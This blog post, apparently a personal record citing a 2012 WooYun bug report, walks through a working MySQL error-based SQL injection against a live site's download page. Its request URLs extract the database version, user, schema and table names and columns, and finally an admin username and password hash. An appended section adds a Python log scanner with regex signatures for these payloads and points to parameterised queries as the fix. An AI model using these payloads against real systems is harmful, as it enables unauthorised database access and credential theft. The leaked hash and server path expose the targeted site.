
PHP + MySQL advanced error-based injection, tested and confirmed working

Posted on 2012-9-13 17:52:09
http://www.wooyun.org/bugs/wooyun-2010-01666
I had been looking for something to test this on and did not expect to find it here. I can test it; this is just a record for my own notes.

http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003

/data0/htdocs/leqi_new/app/myapp.php

Or:

/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********user()**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********database()**********/ leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********enumerate database names one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test

/**********enumerate table names one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users

/**********enumerate column names one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
11 341 351 361
/**********dump data**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd
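Seen from the defending side, every request in the post above has the same shape, and that shape can be flagged in web access logs. The following is an added example, not part of the original post: the log lines, addresses and paths are constructed, and the trait names and the threshold of two are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Traits of the duplicate-key error-based payloads quoted in the post,
# checked after URL decoding. No single trait is conclusive on its own.
SIGNATURES = {
    "floor_rand": re.compile(r"floor\s*\(\s*rand\s*\([^)]*\)\s*\*\s*2\s*\)", re.I),
    "count_group_by": re.compile(r"count\s*\(\s*\*\s*\).*\bgroup\s+by\b", re.I | re.S),
    "information_schema": re.compile(r"\binformation_schema\s*\.", re.I),
    "nested_select": re.compile(r"\(\s*select\b.*\(\s*select\b", re.I | re.S),
}
# Client address and request target from a combined-format access log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalise(target):
    """Undo up to three layers of URL encoding ('+' is treated as a space)."""
    for _ in range(3):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target

def matched_traits(target):
    """Names of the SIGNATURES entries found in the decoded request target."""
    text = normalise(target)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

def scan(log_lines, threshold=2):
    """Return (client, traits) for each request matching >= threshold traits."""
    alerts = []
    for line in log_lines:
        m = REQUEST.match(line)
        if m:
            traits = matched_traits(m.group(2))
            if len(traits) >= threshold:
                alerts.append((m.group(1), traits))
    return alerts

# Constructed sample log (documentation addresses, hypothetical paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Sep/2012:17:40:00 +0800] "GET /download/file/1600003 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [13/Sep/2012:17:40:05 +0800] "GET /search?q=mysql+count(*)+with+group+by HTTP/1.1" 200 2048',
    '198.51.100.7 - - [13/Sep/2012:17:41:12 +0800] "GET /item/id/42%27+or+1=(select+1+from+(select+count(*),'
    'concat((select+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23 HTTP/1.1" 500 312',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

The search request trips one trait and stays below the threshold; only the third line is reported. Log matching of this kind is for triage, and the underlying fix remains binding the `id` value as a parameter instead of concatenating it into the query.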